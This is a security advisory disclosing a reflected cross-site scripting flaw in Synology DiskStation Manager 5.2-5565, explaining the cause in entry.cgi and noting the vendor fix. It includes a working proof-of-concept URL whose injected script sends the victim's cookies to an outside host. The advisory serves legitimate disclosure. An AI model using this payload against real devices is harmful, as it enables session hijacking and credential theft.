Reflected Cross-Site Scripting in Synology DiskStation Manager

Abstract

A reflected Cross-Site scripting vulnerability was found in Synology DiskStation Manager. This issue allows attackers to perform a wide variety of actions, such as stealing victims' session tokens or login credentials if available, performing arbitrary actions on their behalf but also performing arbitrary redirects to potential malicious websites.

Tested version

This issue was tested on Synology DiskStation Manager version 5.2-5565.

Fix

Synology reports that this issue has been resolved in DiskStation Manager version 5.2-5565 Update 1 (2015/05/21). https://www.synology.com/en-global/releaseNote/DS214play

Introduction

DiskStation Manager (DSM) is web-based operating system found on every Synology NAS. It can be used to manage data, including documents, photos, music, and videos. A reflected Cross-Site scripting vulnerability was found in Synology DiskStation Manager.

Details

Reflected cross-site scripting vulnerability is introduced in entry.cgi due to setting an incorrect response content type. The response states that the returned data is HTML. However, it actually returns JSON. All compound JSON parameters echoed into the application's response without input validation result in reflected Cross-Site Scripting with an incorrect response type such as HTML.

Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials if available, performing arbitrary actions on their behalf but also performing arbitrary redirects to potential malicious websites.

The following proof of concept demonstrates this issue: http://:5000/webapi/entry.cgi?compound=%5B{%22api%22%3a%22%3Cimg+src%3dx+onerror%3dthis.src%3d%27https%3a//www.securify.nl/%3fc%3d%27%2bdocument.cookie%3E%22%2c%22method%22%3a%22status%22%2c%22version%22%3a1}%2c{%22api%22%3a%22SYNO.Core.System.Utilization%22%2c%22method%22%3a%22get%22%2c%22version%22%3a1%2c%22type%22%3a%22current%22%2c%22resource%22%3a%5B%22cpu%22%2c%22memory%22%2c%22network%22%5D}%5D&api=SYNO.Entry.Request&method=request&version=1

Questions or feedback?